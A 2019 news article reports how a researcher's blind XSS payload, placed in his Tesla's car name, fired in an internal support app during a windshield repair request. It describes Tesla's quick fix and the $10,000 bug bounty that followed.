Published on July 17th, 2019 📆 | 5515 Views ⚑0
Cracked Tesla 3 Windshield Leads to $10,000 Bug Bounty
Tesla paid a large bug bounty for a cross-site scripting (XSS) vulnerability in one of its backend apps that allowed gleaning vital statistics about a vehicle.
A hacker and web application security researcher, also an owner of a Tesla 3, found the bug by chance after trying to test its defenses against various attacks.
Sam Curry initially tried to sees if the car was vulnerable to format string attacks and named it ‘%x.%x.%x.%x’ but nothing happened.
Multiple attempts later, he noticed that the car supported a long string of characters and decided to give it the name of a payload he had set up through the XSS Hunter automated test service.
He kept poking around to no avail and finally called it quits. One day in June, a rock cracked the windshield of Curry’s Tesla and he set up an appointment for a replacement.
After getting a reply that someone was looking into his request Curry checked XSS Hunter and found that the Tesla agent had fired the blind-XSS payload and data was coming in as a result.
The context was a Tesla subdomain that offered access to current information about the car, which included speed, temperature, firmware version, tire pressure, local timezone, and lock state.
Trying to reach the vulnerable subdomain resulted in failure as it was probably restricted for internal use.
The researcher assumes that the vulnerable web app’s functionality relies on “the different hyperlinks within the DOM [interface].”
Live support agents can interact with the car by sending updates and most likely change their configuration, Curry said in a blog post this week.
This may have allowed them to create a request that initiated a specific action that could lead to retrieving information about both the car and the customer.
Curry reported the problem to Tesla through the Bugcrowd bug bounty platform on June 20 and the company acknowledged the bug and rolled out a hotfix within about half a day.
There was no mention of a reward in the message Tesla sent to Curry but the researcher received a bounty of $10,000 two weeks later.